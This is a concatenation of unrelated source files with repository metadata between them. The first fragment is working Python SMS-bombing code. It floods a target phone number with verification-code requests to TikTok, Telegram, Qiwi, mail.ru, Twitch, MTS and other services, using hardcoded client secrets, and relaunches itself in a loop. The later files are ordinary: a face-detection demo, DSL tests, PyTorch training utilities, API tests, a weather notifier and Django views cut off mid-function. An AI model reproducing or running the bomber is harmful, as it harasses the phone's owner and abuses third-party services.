print(colored('stavropol-[+]', 'yellow'))
except:
print(colored('stavropol-[-]', 'yellow'))
try:
a = requests.post("https://m.tiktok.com/node-a/send/download_link", json={"slideVerify":0,"language":"ru","PhoneRegionCode":"7","Mobile":phone[1:],"page":{"pageName":"home","launchMode":"direct","trafficType":""}}, headers=headers)
print(colored('tiktok-[+]', 'yellow'))
except:
print(colored('tiktok-[-]', 'yellow'))
try:
a = requests.post("https://api.sunlight.net/v3/customers/authorization/", data={"phone": phone}, headers=headers)
print(colored('sunlight-[+]', 'cyan'))
except:
print(colored('sunlight-[-]', 'cyan'))
try:
a = requests.post("https://cloud.mail.ru/api/v2/notify/applink",
json={
"phone": "+" + phone,
"api": 2,
"email": '[email protected]',
"x-email": "x-email",
}, headers=headers)
print(colored('mail.ru-[+]', 'blue'))
except:
print(colored('mail.ru-[-]', 'blue'))
try:
a = requests.post("https://mobile-api.qiwi.com/oauth/authorize",
data={
"response_type": "urn:qiwi:oauth:response-type:confirmation-id",
"username": phone,
"client_id": "android-qw",
"client_secret": "zAm4FKq9UnSe7id",
}, headers=headers)
print(colored('qiwi-[+]', 'magenta'))
except:
print(colored('qiwi-[-]', 'magenta'))
try:
a = requests.post("https://lenta.com/api/v1/authentication/requestValidationCode",
json={"phone": "+" + phone}, headers=headers)
print(colored('tiktok-[+]', 'yellow'))
except:
print(colored('tiktok-[-]', 'yellow'))
try:
a = requests.post("https://passport.twitch.tv/register?trusted_request=true",
json={
"birthday": {"day": 12, "month": 10, "year": 2000},
"client_id": "kd1unb4b3q4t58fwlpcbzcbnm76a8fp",
"include_verification_code": True,
"password": 'Danil5564554',
"phone_number": phone,
"username": 'bhtrtrrrtbhtrbhtr',
}, headers=headers)
print(colored('twitch.tv-[+]', 'yellow'))
except:
print(colored('twitch.tv-[-]', 'yellow'))
try:
a = requests.post("https://my.telegram.org/auth/send_password",
data={"phone": "+" + phone}, headers=headers)
print(colored('telegram-[+]', 'magenta'))
except:
print(colored('telegram-[-]', 'magenta'))
try:
a = requests.post('https://prod.tvh.mts.ru/tvh-public-api-gateway/public/rest/general/send-code',
params={'msisdn': phone}, headers=headers)
print(colored('mts.ru-[+]', 'cyan'))
except:
print(colored('mts.ru-[-]', 'cyan'))
try:
a = requests.post('https://www.etm.ru/cat/runprog.html',
data={'m_phone': phone, 'mode': 'sendSms', 'syf_prog': 'clients-services', 'getSysParam': 'yes'}, headers=headers)
print(colored('etm.ru-[+]', 'green'))
except:
print(colored('etm.ru-[-]', 'green'))
print(colored(f'{f}' + ' - круг закончин!', 'green'))
print(colored('Спам прекращён!', 'magenta'))
time.sleep(3)
os.system("python3 dibom.py")
exit()
else:
os.system("python3 dibom.py")
exit()
except:
os.system("python3 dibom.py")
exit()
input()
| [
"[email protected]"
] | |
a132d6e2bec0e88d70cafe8181942a94ddfd3b75 | 4f9c36da69695ec3acd440f5cc173a4946606453 | /src/detect_face_demo.py | 69932f5b8d433eeb059ea2e288d72e104a519fdb | [
"MIT"
] | permissive | yuhaoluo/facenet | a219841cd9174a8d329c4387a85c0ff2505ccccc | d3a3087f52ae1a17a77a1dadb81c53911be97b4b | refs/heads/master | 2020-04-06T09:19:57.746972 | 2018-11-13T07:32:41 | 2018-11-13T07:32:41 | 157,337,932 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,861 | py | # MIT License
#
# Copyright (c) 2016 David Sandberg
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from scipy import misc
import sys
import os
import argparse
import tensorflow as tf
import numpy as np
import facenet
import align.detect_face
import random
from time import sleep
import time
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
def main(args):
sleep(random.random())
output_dir = os.path.expanduser(args.output_dir)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
# Store some git revision info in a text file in the log directory
src_path,_ = os.path.split(os.path.realpath(__file__))
facenet.store_revision_info(src_path, output_dir, ' '.join(sys.argv))
dataset = facenet.get_dataset(args.input_dir)
print('Creating networks and loading parameters')
with tf.Graph().as_default():
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=args.gpu_memory_fraction)
sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options, log_device_placement=False))
with sess.as_default():
start_time = time.time();
pnet, rnet, onet = align.detect_face.create_mtcnn(sess, None)
print('load mtcnn model time: ', (time.time() - start_time))
minsize = 20 # minimum size of face
threshold = [ 0.6, 0.7, 0.7 ] # three steps's threshold
factor = 0.709 # scale factor
# Add a random key to the filename to allow alignment using multiple processes
random_key = np.random.randint(0, high=99999)
bounding_boxes_filename = os.path.join(output_dir, 'bounding_boxes_%05d.txt' % random_key)
with open(bounding_boxes_filename, "w") as text_file:
nrof_images_total = 0
nrof_successfully_aligned = 0
if args.random_order:
random.shuffle(dataset)
for cls in dataset:
output_class_dir = os.path.join(output_dir, cls.name)
if not os.path.exists(output_class_dir):
os.makedirs(output_class_dir)
if args.random_order:
random.shuffle(cls.image_paths)
for image_path in cls.image_paths:
nrof_images_total += 1
filename = os.path.splitext(os.path.split(image_path)[1])[0]
output_filename = os.path.join(output_class_dir, filename+'.png')
print(image_path)
if not os.path.exists(output_filename):
try:
img = misc.imread(image_path)
except (IOError, ValueError, IndexError) as e:
errorMessage = '{}: {}'.format(image_path, e)
print(errorMessage)
else:
if img.ndim<2:
print('Unable to align "%s"' % image_path)
text_file.write('%s\n' % (output_filename))
continue
if img.ndim == 2:
img = facenet.to_rgb(img)
img = img[:,:,0:3]
detect_time_start = time.time()
bounding_boxes, _ = align.detect_face.detect_face(img, minsize, pnet, rnet, onet, threshold, factor)
detect_time = time.time() - detect_time_start
print('detect_face_time: ', detect_time)
# =============================================================================
# nrof_faces = bounding_boxes.shape[0]
# if nrof_faces>0:
# det = bounding_boxes[:,0:4]
# det_arr = []
# img_size = np.asarray(img.shape)[0:2]
# if nrof_faces>1:
# if args.detect_multiple_faces:
# for i in range(nrof_faces):
# det_arr.append(np.squeeze(det[i]))
# else:
# bounding_box_size = (det[:,2]-det[:,0])*(det[:,3]-det[:,1])
# img_center = img_size / 2
# offsets = np.vstack([ (det[:,0]+det[:,2])/2-img_center[1], (det[:,1]+det[:,3])/2-img_center[0] ])
# offset_dist_squared = np.sum(np.power(offsets,2.0),0)
# index = np.argmax(bounding_box_size-offset_dist_squared*2.0) # some extra weight on the centering
# det_arr.append(det[index,:])
# else:
# det_arr.append(np.squeeze(det))
#
# for i, det in enumerate(det_arr):
# det = np.squeeze(det)
# bb = np.zeros(4, dtype=np.int32)
# bb[0] = np.maximum(det[0]-args.margin/2, 0)
# bb[1] = np.maximum(det[1]-args.margin/2, 0)
# bb[2] = np.minimum(det[2]+args.margin/2, img_size[1])
# bb[3] = np.minimum(det[3]+args.margin/2, img_size[0])
# cropped = img[bb[1]:bb[3],bb[0]:bb[2],:]
# scaled = misc.imresize(cropped, (args.image_size, args.image_size), interp='bilinear')
# nrof_successfully_aligned += 1
# filename_base, file_extension = os.path.splitext(output_filename)
# if args.detect_multiple_faces:
# output_filename_n = "{}_{}{}".format(filename_base, i, file_extension)
# else:
# output_filename_n = "{}{}".format(filename_base, file_extension)
# misc.imsave(output_filename_n, scaled)
# text_file.write('%s %d %d %d %d\n' % (output_filename_n, bb[0], bb[1], bb[2], bb[3]))
# else:
# print('Unable to align "%s"' % image_path)
# text_file.write('%s\n' % (output_filename))
#
# print('Total number of images: %d' % nrof_images_total)
# print('Number of successfully aligned images: %d' % nrof_successfully_aligned)
# =============================================================================
def parse_arguments(argv):
parser = argparse.ArgumentParser()
parser.add_argument('input_dir', type=str, help='Directory with unaligned images.')
parser.add_argument('output_dir', type=str, help='Directory with aligned face thumbnails.')
parser.add_argument('--image_size', type=int,
help='Image size (height, width) in pixels.', default=182)
parser.add_argument('--margin', type=int,
help='Margin for the crop around the bounding box (height, width) in pixels.', default=44)
parser.add_argument('--random_order',
help='Shuffles the order of images to enable alignment using multiple processes.', action='store_true')
parser.add_argument('--gpu_memory_fraction', type=float,
help='Upper bound on the amount of GPU memory that will be used by the process.', default=1.0)
parser.add_argument('--detect_multiple_faces', type=bool,
help='Detect and align multiple faces per image.', default=True)
return parser.parse_args(argv)
if __name__ == '__main__':
main(parse_arguments(sys.argv[1:]))
| [
"[email protected]"
] | |
e0aa7247ec9ab1a7dd3b83e32c5e207cff94e4b0 | 74565d83bccccfae0d57d0e947f12db2bcae2999 | /phi/tests/test_dsl.py | 7de169da513bd1d88114d2556a8ba230e9e7485a | [
"MIT"
] | permissive | iCodeIN/phi | 2fe9eaaf21615381e1b1815853adeb76a79fb696 | 87fd7100a76f823232f4fd8360498b4b80675265 | refs/heads/master | 2023-03-21T07:50:28.218564 | 2018-08-13T14:14:07 | 2018-08-13T14:14:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,615 | py | from phi.api import *
from phi import dsl
import pytest
class TestDSL(object):
"""docstring for TestDSL."""
def test_compile(self):
f = Seq(P + 1, P * 2)
assert f(2) == 6
def test_read(self):
refs = dict(
x = 10
)
f = Read('x')
y, new_refs = f(None, True, **refs)
assert refs == new_refs #read doesnt modify
assert y == 10
def test_write(self):
r = dsl.Ref('r')
f = Seq(
Write(a = P + 1),
Write(b = P * 2),
Write(c = P * 100),
List(Read.c, Read.a, Read.b)
)
assert [600, 3, 6] == f(2)
r = Ref('r')
f = Seq(
Write(a = P + 1),
Write(b = P * 2),
Write(c = P * 100), r.write,
List(Read.c, Read.a, Read.b)
)
assert [600, 3, 6] == f(2)
assert r() == 600
def test_write_tree(self):
f = Seq(
P + 1,
P * 2,
List(
Write(c = P * 100)
,
P - 3
,
Read.c
)
)
assert [600, 3, 600] == f(2)
def test_write_tree(self):
f = Seq(
P + 1,
P * 2,
List(
P * 100
,
Write(c = P)
,
P - 3
,
Read('c')
)
)
assert [600, 6, 3, 6] == f(2)
def test_input(self):
f = Seq(
Write(a = P),
P + 1,
List(
Seq(
10,
P * 2
)
,
Read('a')
,
P
)
)
assert [20, 2, 3] == f(2)
def test_identities(self):
f = List(
Seq(),
List()
)
assert [4, []] == f(4)
def test_single_functions(self):
f = List(
P * 2,
List(P + 1)
)
assert [2, [2]] == f(1)
def test_class(self):
f = Seq(
str,
P + '0',
int
)
assert 20 == f(2)
ast = dsl._parse(str)
assert type(ast) is dsl.Expression
def test_list(self):
f = Seq(
List(
P + 1
,
P * 2
),
List(
Seq(
lambda l: map(str, l),
list
)
,
P
)
)
assert [['4', '6'], [4, 6]] == f(3)
def test_dict(self):
f = Seq(
Dict(
original = P,
upper = Obj.upper(),
len = len
),
List(
P
,
Seq(
Rec.len,
P * 2
)
)
)
[obj, double_len] = f("hello")
assert obj.original == "hello"
assert obj.upper == "HELLO"
assert obj.len == 5
assert double_len == 10
def test_fn(self):
assert "hola" == P.Pipe(
"HOLA",
Obj.lower()
)
def test_record_object(self):
x = P.Pipe(
[1,2,3],
Dict(
sum = sum
,
len = len
)
)
assert x.sum == 6
assert x.len == 3
assert x['sum'] == 6
assert x['len'] == 3
def test_compile_refs(self):
x = P.Pipe(
[1,2,3],
Dict(
sum = sum
,
len = len
,
x = Read.x
,
z = Read('y') + 2
),
refs = dict(
x = 10,
y = 5
)
)
assert x.sum == 6
assert x.len == 3
assert x.x == 10
assert x.z == 7
assert x['sum'] == 6
assert x['len'] == 3
assert x['x'] == 10
assert x['z'] == 7
#############################
f = P.Seq(
If( P > 2,
Write(s = P)
),
Read('s')
)
assert f(3) == 3
with pytest.raises(Exception):
f(1)
def test_nested_compiles(self):
assert 2 == P.Pipe(
1, Write(s = P),
Seq(
Write(s = P + 1)
),
Write(s = P)
)
def test_if(self):
f = P.Seq(
If( P > 0,
P
).Else(
0
)
)
assert f(5) == 5
assert f(-3) == 0
def test_right_hand(self):
f = Seq(
P + 1,
[ P, 2, 3 ]
)
assert f(0) == [ 1, 2, 3 ]
f = Seq(
P + 1,
( P, 2, 3 )
)
assert f(0) == ( 1, 2, 3 )
f = Seq(
P + 1,
{ P, 2, 3 }
)
assert f(0) == { 1, 2, 3 }
f = Seq(
P + 1,
{"a": P, "b": 2, "c": 3 }
)
assert f(0) == {"a": 1, "b": 2, "c": 3 }
def test_readlist(self):
assert [2, 4, 22] == Pipe(
1,
Write(a = P + 1), #a = 1 + 1 == 2
Write(b = P * 2), #b = 2 * 2 == 4
P * 5, # 4 * 5 == 20
P + 2, # 20 + 2 == 22
ReadList('a', 'b', P) # [a, b, 22] == [2, 4, 22]
)
| [
"[email protected]"
] | |
9959840f6b1866b0284ec39f9c306c96ab928a7a | 3309fd8a4fcd8bc5a267de55d9c493a4cd875566 | /greet.py | d055c3f557175cd941ba1e5c5d60ff61fabd5bee | [] | no_license | asconem/PythonFundamentals.Exercises.Part2 | e8f0f933afd901ab354a95f6651c98f5ebc94e18 | e1e6cfd4d27cdc27f1cdf7e949f70e9922905a20 | refs/heads/master | 2022-10-09T23:54:27.960572 | 2020-06-03T02:45:37 | 2020-06-03T02:45:37 | 260,521,446 | 0 | 0 | null | 2020-05-01T17:45:14 | 2020-05-01T17:45:13 | null | UTF-8 | Python | false | false | 377 | py | def name_input():
"""
This function requests a user to enter their name via an input prompt
"""
user_name = input("Please enter your name: ")
return user_name
def greet(name):
"""
This function takes in a person's name as a parameter and returns a customized greeting
"""
print("Hello " + name + "! How are you today?")
greet(name_input()) | [
"[email protected]"
] | |
94dd16cf8586b81bf968e7826152716ef2c63d58 | da8cf50a82a3e18f0b72409ee260de44f9081264 | /training.py | 940267a6abebb3ba3c6b11695b9cf69150359980 | [] | no_license | jamied157/thesispublic | 1d838a6a98b0a6e4dd3bd601bb4b008d29bc2f46 | 319fd6ba1e95267b85f37ca06d8b716264e80f1a | refs/heads/master | 2020-07-18T17:07:26.659284 | 2019-09-04T09:31:56 | 2019-09-04T09:31:56 | 206,281,250 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,014 | py | import numpy as np
import torch
from torch import Tensor
from torch.utils import data
from sklearn.model_selection import ParameterGrid
import logging
class UncertaintyDataset(data.Dataset):
"""
Characterises a dataset for PyTorch
"""
def __init__(self, X, Y):
self.X, self.Y = Tensor(X), Tensor(Y)
self.y_normalised = False
self.x_normalised = False
self.y_std = self.Y.std()
self.y_mean = self.Y.mean()
self.x_std = self.X.std(dim=0)
self.x_mean = self.X.mean(dim=0)
def __len__(self):
"""Denotes the total number of samples"""
return self.X.shape[0]
def n_features(self):
return self.X.shape[1]
def normalise_y(self):
"""Normalise outputs and save parameters to instance"""
if not self.y_normalised:
self.Y = (self.Y - self.y_mean) / self.y_std
self.y_normalised = True
else:
pass
return self.y_mean, self.y_std
def normalise_x(self):
"""Normalise outputs and save parameters to instance"""
if not self.x_normalised:
# Check for 0 standard deviation variables
constant_x = self.x_std == 0
self.X = (self.X - self.x_mean)/self.x_std
self.X[:, constant_x] = 0
self.x_normalised = True
else:
pass
return self.x_mean, self.x_std
def __getitem__(self, index):
"""Generates one sample of data"""
return self.X[index, :], self.Y[index]
def ensemble_loss(y: Tensor, y_hat_arr: Tensor, tau: float):
"""Loss for MC Dropout Net"""
t = y_hat_arr.shape[0]
ll = (torch.logsumexp(-0.5 * tau * (y - y_hat_arr.squeeze()) ** 2, 0) - np.log(t)
- 0.5 * np.log(2 * np.pi) + 0.5 * np.log(tau))
return -ll.mean()
def normal_nll(targets: torch.Tensor, predictions: torch.Tensor, var: torch.Tensor):
"""
Outputs the mean log likelihood of a normal rv for all targets
:param targets: output variables
:param predictions: predictions made for targets
:param var: array of predicted variances for each target
:return mean log likelihood for a normal rv:
"""
targets = targets.squeeze()
predictions = predictions.squeeze()
var = var.squeeze()
reg_term = 0.5 * torch.log(2 * np.pi * var)
err_term = 0.5 * (var ** (-1)) * (targets - predictions) ** 2
return torch.mean(reg_term + err_term)
def cross_validate(train_data, ModelClass, param_grid):
"""Cross validation routine - splits once and loops over possible parameters, reports parameters with least error"""
param_grid = ParameterGrid(param_grid)
num_training_examples = int(0.8 * len(train_data))
X_train, y_train = train_data[:num_training_examples]
new_train_data = UncertaintyDataset(X_train, y_train)
X_valid, y_valid = train_data[num_training_examples:]
valid_data = UncertaintyDataset(X_valid, y_valid)
best_nll = float('inf')
best_param_dict = {}
for param_dict in param_grid:
# print('Trying ' + str(param_dict))
logging.info('INFO DICT: ' + str(param_dict))
model = ModelClass(X_train.shape[1], param_dict)
model.fit(new_train_data)
model_nll, _, _ = model.test_loss(valid_data)
# print('nll: {:.3f}'.format(model_nll))
if model_nll < best_nll:
best_nll = model_nll
best_param_dict = param_dict
return best_param_dict
def standard_training_setup(train_data: UncertaintyDataset, test_data: UncertaintyDataset, ModelClass, param_grid):
"""Standard setup for uncertainty eexperiments"""
best_param_dict = cross_validate(train_data, ModelClass, param_grid)
print('Parameters: ' + str(best_param_dict))
model_1 = ModelClass(train_data.n_features(), best_param_dict)
model_1.fit(train_data)
test_nll, test_rmse, calibration_arr = model_1.test_loss(test_data)
return test_nll, test_rmse, calibration_arr, best_param_dict
| [
"[email protected]"
] | |
c7c8c9f682ca024b8700ca441791a0178cd6a7c8 | 224ca57f7f0ceeaf93b2ae93bcaedee5e1e8589d | /leetcode/closure.py | 67cd61558f7eb0edb72da9f4ba6da07ace8b5774 | [] | no_license | myliu/python-algorithm | 71fa69502596634464007f64d3ac02826d3b07df | 036a29d681cc91f2317d454e04530d7375d55478 | refs/heads/master | 2021-01-23T11:34:07.732641 | 2017-02-27T00:27:58 | 2017-02-27T00:27:58 | 13,375,481 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 379 | py | # http://www.shutupandship.com/2012/01/python-closures-explained.html
def generate_power_func(n):
print "id(n): %X" % id(n)
def nth_power(x):
return x**n
print "id(nth_power): %X" % id(nth_power)
return nth_power
if __name__ == '__main__':
raise_to_2 = generate_power_func(2)
print raise_to_2.__closure__[0].cell_contents
print raise_to_2(5) | [
"[email protected]"
] | |
876bc78f7d3c3f6a9d70df6c7f854fd2c0dc8eb8 | fd27119866acf233768d006af100f1fd8027fd14 | /tests_inprogress/test_heartbeats.py | 3609a6c591eea7e9d8dabafcf31ecc9812c36093 | [] | no_license | afrocubanito/cm-python-autoapi | dbdf06c765d46ee932fbd6e35add80d3cb6f8d15 | 2a0e4335842e08220b1745a459ecc7f627bc8087 | refs/heads/master | 2020-04-25T12:51:28.900309 | 2018-09-19T18:03:15 | 2018-09-19T18:03:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,985 | py | __author__ = 'rkaye'
from nose import with_setup
from nose.tools import nottest
import logging
import logging.config
import configparser
from framework.constants import CONFIG_FILE_PATH, LOG_FILE_PATH
from framework.authentication_rest import login, logout, get_auth_token
from framework.http_rest import *
from framework.player_rest import Player
from framework.heartbeats_rest import Heartbeats, Heartbeat_event
import inspect
print(CONFIG_FILE_PATH)
config = configparser.ConfigParser()
config.read(CONFIG_FILE_PATH)
baseurl = config['login']['baseurl']
logging.config.fileConfig(LOG_FILE_PATH)
logging.debug('Logging config file path is: {}'.format(CONFIG_FILE_PATH))
session = requests.Session()
namespace = config['test']['namespace']
api_version = config['api_info']['api_version']
player_id = 0
def this_function_name():
return inspect.stack()[1][3]
def t_setup():
'''
In order to test this case, a new user must be created and the session must be logged in as this new user.
That user must create a media and then approve it.
'''
# Begin by initiating a new login session for this test case.
global config, session, media_id_list, baseurl, namespace, player_id, api_version
logging.info('Beginning test setup')
baseurl = config['login']['baseurl']
username = config['login']['username']
password = config['login']['password']
logging.debug('Read login info from config file and ready to begin.')
logging.info('Initializing session for next test case.')
media_path = config['path']['media']
# INITIALIZE SESSION OBJECT
session = login(username, password, baseurl)
assert session is not None
# Create a player to run these tests against
player = Player(api_version=api_version)
player_name = namespace + "_" + this_function_name() + "_" + "player"
player_create_result = player.create_player(session=session, baseurl=baseurl, name=player_name)
logging.info('Result from create player call in test case setup is: ()'.format(player_create_result))
player_id = player.get_id()
def t_teardown():
global session, player_id, api_version
# Delete Player created for this test case
player = Player(api_version)
#player.delete_player_by_id(session,baseurl, id = player_id)
response = logout(session, config['login']['baseurl'])
assert response
@with_setup(t_setup, t_teardown)
def test_initial_get_heartbeat_sequence():
'''
Use GET /api/rest/players/{id} to pull in the player data for this test case
pull out the UUID of the player returned by the GET
Use GET /api/rest/heartbeats/sequence/{uuid} - validate that it starts at 0
:return:
'''
global session, namespace, baseurl, api_version, player_id
logging.info('Beginning {}'.format(this_function_name()))
# Get the Player data and parse the UUID
player = Player(api_version)
player_get_result = player.find_player_by_id(session, baseurl=baseurl, id=player_id)
logging.debug('Current Player in use for this test case is: {}'.format(player.last_response.text))
uuid = player.get_response_key('uuid')
# Get the sequence number of the heartbeats
heartbeat_controller = Heartbeats(api_version)
assert heartbeat_controller.get_current_heartbeat_sequence_of_player(session, baseurl=baseurl, uuid=uuid), 'Failed to retrieve sequence number.'
sequence = heartbeat_controller.get_json_data()
logging.info('Current sequence number is: {}'.format(sequence))
assert sequence == 0, 'Sequence number not 0. Sequence number is {}'.format(sequence)
@with_setup(t_setup, t_teardown)
def test_report_heartbeat():
'''
Use POST /api/rest/heartbeats to add a heartbeat message to the player created in the setup
Use GET /api/rest/players to pull the player down and examine the heartbeat - make sure it is present.
:return:
'''
global session, baseurl, player_id, api_version, namespace
logging.info ('Beginning {}'.format(this_function_name()))
# Get UUID of player under test
player = Player(api_version)
player.find_player_by_id(session,baseurl = baseurl, player_id =player_id)
logging.debug('Current Player in use for this test case is: {}'.format(player.last_response.text))
uuid = player.get_response_key('uuid')
# Create a Heartbeat event
heartbeat_problem_message = 'Test Heartbeat message for ns ' + namespace
heartbeat = Heartbeat_event(api_version = api_version, problemMessage = heartbeat_problem_message)
# Send the heartbeat message to the player under test
heartbeat_controller = Heartbeats(api_version)
assert heartbeat_controller.report_heartbeat(session, baseurl = baseurl, uuid = uuid, events = [heartbeat.get_json_data()] ), 'Incorrect response code from report heartbeat message.'
#Verify that the heartbeat message got added to the player under test
@with_setup(t_setup, t_teardown)
def test_increment_get_heartbeat_sequence():
pass
| [
"[email protected]"
] | |
f0a307f6a7c95294fb2c74511822129b3d6ba922 | 682ef96201c2cb8591b70bc7bed16ccd6e66a56c | /ecommerce/views.py | 1fe5cf5c002fb3b9ff178a27f0c8dc99448f5f5a | [] | no_license | leducthanh/Ecommerce | 8ea6246f866e97fbb434d23359b495863b06ff5d | 50460ace23cb865f1d14c11d5d88afe440092aae | refs/heads/master | 2023-01-11T05:25:21.533948 | 2020-11-14T14:49:10 | 2020-11-14T14:49:10 | 286,441,438 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 246 | py | from django.shortcuts import render, redirect
from django.contrib.auth import authenticate, get_user_model, login, logout
# Create your views here.
def home_page(request):
context= {
}
return render(request,'home_page.html',context)
| [
"[email protected]"
] | |
9278531e90e33fc43aaece367c9562b9b6808285 | a7288a7cc1e1a2c480347b7d7736e7264d49a7ce | /youtube_downloader_project/manage.py | 4ceec4879d34b51e0034ecffbb1d1d6bfdc6c532 | [] | no_license | JosephKhajoo/youtube_project | 2b259bf6c35db9a2940de51b52b91b69b5adf65d | 0be899be6a8f327e26171e04c4bd1fbccf81d6c6 | refs/heads/main | 2023-03-10T01:31:20.683766 | 2021-02-28T22:00:22 | 2021-02-28T22:00:22 | 343,223,685 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 682 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'youtube_downloader_project.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
36d9139dfd9873072c8719ca26c5ebc7c423058e | 595fc1fd741666554a6643d60b029855d8e4ea15 | /Messenger.py | 8b90d8cff35fa719027fa90c127da15e01d62a5e | [] | no_license | CLDXiang/weather_email_notification | 31e487d806ce863c231748d5ad64c64ccbe338b8 | 2d75654fbec777bbc84bf4aae17433e38c26d463 | refs/heads/master | 2020-12-03T03:55:03.414188 | 2017-08-18T16:25:48 | 2017-08-18T16:25:48 | 93,936,781 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,100 | py | # -*- coding:utf-8 -*-
# 得到天气信息
import datetime
import requests
import json
class Messenger():
def __init__(self):
with open('./config.json', 'r') as f:
self.KEY = json.load(f)['HEKey']
self.num2cn = {1: '一', 2: '二', 3: '三', 4: '四', 5: '五', 6: '六', 7: '日'}
def get_wea(self, record=False, city='上海'):
api_url = 'https://free-api.heweather.com/v5/forecast?city={city}&key={key}'.format(city=city, key=self.KEY)
wea_list = [] # weather
print('正在从 free-api.heweather.com 获取' + city + '的天气信息...')
# sleep(3)
page = requests.get(api_url)
page.encoding = 'utf-8'
wea_info = page.json()
for i, day_info in enumerate(wea_info['HeWeather5'][0]['daily_forecast']):
date = day_info['date'][-2:] + '日'
if i == 0:
date += '(今天)'
elif i == 1:
date += '(明天)'
elif i == 2:
date += '(周{})'.format(self.num2cn[(datetime.datetime.now() + datetime.timedelta(days=2)).isoweekday()])
wea_list.append((date, day_info['cond']['txt_d'] + '-' + day_info['cond']['txt_n'],
day_info['tmp']['min'] + '/' + day_info['tmp']['max']))
print('获取' + city + '天气信息完成')
if record:
with open('./record.txt', 'w') as f:
for day in wea_list:
f.write(' '.join(day) + '\n')
print('已将记录写入record.txt')
return wea_list
def whether_notice(self, wea_list, day=2):
'''
:param wea_list: [(day,weather,temperature),(day,weather,temperature),...]
:param day: how many days. default: today and tomorrow.
:return: True/False
'''
for wea in wea_list[:day]:
if any([(i in wea[1]) for i in ['雨', '雪', '冰', '霾', '暴']]):
return True
return False
messenger = Messenger()
if __name__ == '__main__':
messenger.get_wea(record=True)
| [
"[email protected]"
] | |
5a7160d511dd2eb253990b60738b3b9a31a41143 | a07ed3f4984e8153219ef25927a5784c127f43a4 | /execute_command/venv/bin/easy_install-3.7 | f12394a8e18c462b84af11f281a787899d95dae8 | [] | no_license | golan1202/Hacking-with-Python | 939333b4e86669527f2ccf846caa49601fc05848 | 98e0b1fef562d64b3e6ec8eab90ed75fb8c3f221 | refs/heads/master | 2020-08-21T23:41:08.979455 | 2019-10-19T21:31:11 | 2019-10-19T21:31:11 | 216,272,690 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 449 | 7 | #!/root/PycharmProjects/execute_command/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.7'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.7')()
)
| [
"[email protected]"
] | |
2f46a242dfd599c2ae9d4ba23d46aa9a5036cc3e | 4236ced786d9087925880a15e506f0965d7ebdc0 | /app/accounts/views.py | 5b46b89bcb5200f45e8bfb543b7b95ac8e7f569d | [] | no_license | ArturRejment/django-course | 94b3f4f06260dbb60e10fda9e58b84555dc37bc6 | 05254950160094b70b80837599bfa9407d9a2363 | refs/heads/main | 2023-05-31T10:07:13.500153 | 2021-06-18T19:34:01 | 2021-06-18T19:34:01 | 376,356,292 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,613 | py | from django.shortcuts import render, redirect
from django.http import HttpResponse
from django.forms import inlineformset_factory
from django.contrib.auth.forms import UserCreationForm
from django.contrib import messages
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import Group
from .decorators import unauthenticated_user, allowed_users, admin_only
from .models import *
from .forms import *
from .filters import *
# Create your views here.
@login_required(login_url = 'login')
@admin_only
def dashboard(request):
orders = Order.objects.all()
customers = Customer.objects.all()
total_customers = customers.count()
total_orders = orders.count()
delivered = orders.filter(status = 'Delivered').count()
pending = orders.filter(status = 'Pending').count()
context = {
'orders': orders,
'customers': customers,
'total_customers': total_customers,
'total_orders': total_orders,
'delivered': delivered,
'pending': pending
}
return render(request, 'accounts/dashboard.html', context)
@login_required(login_url = 'login')
@allowed_users(allowed_roles=['admin'])
def customer(request, **kwargs):
customer = Customer.objects.get(id = kwargs['id'])
orders = customer.order_set.all()
orders_num = orders.count()
myFilter = OrderFilter(request.GET, queryset = orders)
orders = myFilter.qs
context = {
'customer': customer,
'orders': orders,
'orders_num': orders_num,
'order_filter': myFilter
}
return render(request, 'accounts/customer.html', context)
@login_required(login_url = 'login')
@allowed_users(allowed_roles=['admin'])
def products(request):
products = Product.objects.all()
context = {
